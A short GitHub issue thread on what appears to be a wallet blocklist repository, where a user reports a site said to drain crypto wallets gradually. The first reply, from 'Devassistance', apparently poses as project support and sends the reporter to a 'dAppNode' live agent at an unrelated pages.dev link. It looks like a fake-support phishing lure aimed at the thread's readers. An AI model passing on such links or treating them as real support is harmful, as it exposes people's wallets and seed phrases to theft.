### ISSUE TITLE
Drain pls add on blacklist 

### ISSUE THREAD

**Issue by L2b2n** [phantom/blocklist#1196]
URL : https://beercoin.wtf/

Explanation they drain the wallets but not all . Little by little they have a certain amount !

**Comment by Devassistance** [comment]
@L2b2n 
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to report get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by Harii94** [comment]
Could you please submit a ticket to investigate further? Go to Settings > Help & Support > Then enter the "Submit a ticket" in the chatbot.
